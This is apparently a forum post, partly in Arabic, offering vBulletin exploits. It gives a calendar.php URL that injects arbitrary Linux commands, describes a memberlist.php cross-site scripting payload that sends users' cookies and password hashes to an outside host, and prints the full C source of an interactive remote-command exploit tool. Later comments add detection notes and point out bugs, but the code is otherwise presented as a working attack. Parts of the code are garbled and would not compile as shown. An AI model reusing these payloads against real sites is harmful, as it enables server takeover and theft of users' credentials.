___________
ثغرة في منتديات vBulletin في ملف calendar.php
_ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
تأكد من وجود ملف calendar.php
إذا كان موجود إدخل هذا العنوان
http://www.example.com/vb/calendar....mma=%22;echo%20'';%20echo%20%60<comman d>%20%60;die();echo%22
المتغيرات
1-example.com بإسم الموقع
2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd
______________________________________________
ثغرة vBulletin
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or ********** into the document. So by directing a user to, for example:
http://vulnerable/forum/memberlist....E********%3D%27 http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%
2Ephp%3Fcook%3D%27%2B
escape%28document%2E******%29%3C%2Fscript%3E
(NOTE: The URL should be on one line)
You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
******** = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3E********%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco
rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2E******%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#define url1 "calendar.php?calbirthdays=1&action=getday&day ="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"
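/*
 * SIGALRM handler installed by main() to abandon a connect() that has
 * not completed within the -t timeout.
 *
 * Only async-signal-safe calls are made here (CERT SIG30-C): write(2)
 * instead of printf(3), and _exit(2) instead of exit(3). The original
 * used stdio and exit() from inside the handler, which may re-enter
 * stdio internals interrupted mid-operation. The message text and the
 * exit status (0) are unchanged. Trade-off: _exit() does not flush
 * stdio buffers, so output still sitting in a buffered stdout (e.g.
 * when piped) is discarded; that is accepted because flushing cannot
 * be done safely from a signal handler.
 *
 * Note: sigaction expects a handler of type void (*)(int); the caller
 * casts this void(void) function into that slot.
 */
void time_out(void)
{
	static const char msg[] = "\ntimed out on connect()\n";

	/* Return value deliberately ignored: nothing can be done about a
	 * failed write from a handler that is about to terminate. */
	(void)write(STDOUT_FILENO, msg, sizeof msg - 1);
	_exit(0);
}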
/*
 * Print the command-line synopsis for this tool and terminate.
 *
 * prog is argv[0]; it is substituted into the synopsis line and into
 * the two example invocations. Output goes to stdout and the process
 * exits with status 0, exactly as before -- the text below is the
 * original seven printf() calls folded into one adjacent-literal
 * format string so the whole message can be read in one place.
 */
void usage (char *prog)
{
	fprintf(stdout,
		"\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n"
		"\t The -h and -d arguments are required, the rest are optional."
		"\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002."
		"\n\t date must also be a date on the vBulletin board that has an event on it.\n"
		"\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it."
		"\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8"
		"\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n",
		prog, prog, prog);
	exit(0);
}
/*
 * Entry point of the vb_cal.c proof of concept reproduced on this page.
 *
 * Flow, as written: parse options with getopt(), resolve -h with
 * gethostbyname(), connect once under a SIGALRM-driven connect() timeout,
 * then loop forever: read one command line from stdin, percent-encode it,
 * build a single HTTP/1.1 GET for calendar.php from the url1/url2/url3
 * macros and the -d date, send it, echo the server's reply to stdout until
 * EOF, close the stream and reconnect for the next command. Argument
 * errors go through usage(); socket/DNS/connect failures exit(1).
 *
 * Detection note: every request built here carries the literal query
 * fragments from url1..url3 ("calbirthdays=1&action=getday&day",
 * "&comma=%22;echo%20", "%60;die();echo%22") in the request line, uses
 * bare LF line endings, and is padded with NUL bytes to 1024 octets (see
 * the send() call). All of that is easy to match in web server logs or an
 * HTTP-aware IDS.
 *
 * This copy contains extraction artifacts (a string literal split across
 * two lines in the banner, an empty character constant in the "\q" check)
 * that would not compile as shown; the code is left byte-identical here.
 */
int main(int argc, char *argv[])
{
/* c: current getopt() option; x: loop index; sockfd: current TCP socket. */
int c, x, sockfd, verbose = 0;
int timeout = 10;	/* seconds for alarm() around connect(); -t */
int port = 80;		/* -p */
char *path = "/";	/* URL prefix in front of calendar.php; -u */
char *host = NULL, *date = NULL;	/* -h and -d; both required */
char sign = '%';	/* prefix used when percent-encoding a byte */
char *prog;
char tmp[2];		/* one input character plus NUL, for strncat() */
char tmp2[4];		/* "%XX" plus NUL; snprintf() truncates anything longer */
char cmd_buf[501];	/* raw command line from stdin */
char encoded_cmd[501];	/* percent-encoded command (same size as cmd_buf, see note below) */
char data[1024];	/* outgoing HTTP request */
char output[20480];	/* one line of the HTTP response */
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;
memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
prog = argv[0];
/* Banner goes to stderr so it does not mix with the echoed responses on stdout. */
fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
/* The next two lines are one statement whose string literal was broken by
 * extraction; the argc check that follows rejects fewer than 5 or more than
 * 12 arguments before any option is parsed. */
fprintf(stderr, "\t ---[
www.fsix.net\n"); if (argc < 5 || argc > 12)
usage(prog);
while ( (c = getopt(argc, argv, "h:u:t:v")) != -1 )
{
switch(c)
{
case 'h':
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u':
{
path = optarg;
break;
}
case 'p':
{
port = atoi(optarg);	/* unvalidated: non-numeric or out-of-range text silently becomes 0 */
break;
}
case 't':
{
timeout = atoi(optarg);	/* unvalidated, same caveat as -p */
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
/* Both required options must have been supplied. */
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
/* gethostbyname() is IPv4-only and not reentrant; h_addr is the first address. */
if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);
/* Install time_out() for SIGALRM with no flags (so no SA_RESTART). The
 * handler is declared void(void) and cast into the void(*)(int) slot. */
bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);
/* Bound the blocking connect(); time_out() terminates the process if it fires. */
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
/* Return value unchecked: on EOF cmd_buf keeps its previous (cleared) contents. */
fgets(cmd_buf, sizeof(cmd_buf), stdin);
/* Strip the trailing newline left by fgets(). */
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';
/* "\q" quits; the first operand of this comparison is garbled in this copy. */
if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
exit(0);
/* Percent-encode the command byte by byte. Only bytes in the three
 * ranges below pass through unchanged; everything else becomes "%XX".
 * NOTE(review): the first range compares against the integers 0..9,
 * not the characters '0'..'9' (48..57), so decimal digits are encoded
 * while control bytes 0..9 pass through raw. Also, strncat()'s third
 * argument is the number of bytes to append, not the destination size,
 * so it does not bound the total: up to 500 input bytes x 3 output
 * bytes can exceed the 501-byte encoded_cmd. */
for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
else
{
/* "%X" of a negative (signed) char would print 8 hex digits; tmp2 holds
 * only 3 characters, so such bytes come out truncated. */
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
/* Request line = path + url1 + date + url2 + encoded command + url3.
 * Line endings are bare "\n" rather than the "\r\n" HTTP requires. */
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
if (verbose == 1)
printf("\nSending: %s", data);
/* Sends the whole 1024-byte buffer, i.e. the request followed by NUL padding;
 * the return value is not checked. */
send(sockfd, data, sizeof(data), 0);
/* Wrap the socket in a stdio stream for line-oriented reading. */
if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
/* Echo the response line by line until the server closes the connection. */
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}
/* Reset all per-command buffers before the next prompt. */
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
/* fclose() on an fdopen()ed stream also closes sockfd, hence the fresh
 * socket() and connect() below for the next command. */
fclose(f);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}